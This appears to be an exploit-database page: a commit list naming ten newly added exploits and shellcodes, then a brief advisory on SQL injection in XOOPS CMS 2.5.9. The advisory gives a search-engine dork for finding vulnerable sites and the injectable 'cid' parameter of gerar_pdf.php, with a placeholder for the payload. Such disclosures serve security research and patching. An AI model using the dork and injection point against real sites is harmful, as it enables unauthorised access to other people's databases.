945107caf5
10 changes to exploits/shellcodes SpotMSN 2.4.6 - Denial of Service (PoC) DNSS 2.1.8 - Denial of Service (PoC) Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery SOCA Access Control System 180612 - Information Disclosure SOCA Access Control System 180612 - SQL Injection SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin) XOOPS 2.5.9 - SQL Injection OpenProject 5.0.0 - 8.3.1 - SQL Injection Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)
24 lines
No EOL
453 B
Text
24 lines
No EOL
453 B
Text
[+] Sql Injection on XOOPS CMS v.2.5.9
|
|
|
|
[+] Date: 12/05/2019
|
|
|
|
[+] Risk: High
|
|
|
|
[+] CWE Number : CWE-89
|
|
|
|
[+] Author: Felipe Andrian Peixoto
|
|
|
|
[+] Vendor Homepage: https://xoops.org/
|
|
|
|
[+] Contact: felipe_andrian@hotmail.com
|
|
|
|
[+] Tested on: Windows 7 and Gnu/Linux
|
|
|
|
[+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;)
|
|
|
|
[+] Exploit :
|
|
|
|
http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection]
|
|
|
|
|
|
[+] EOF |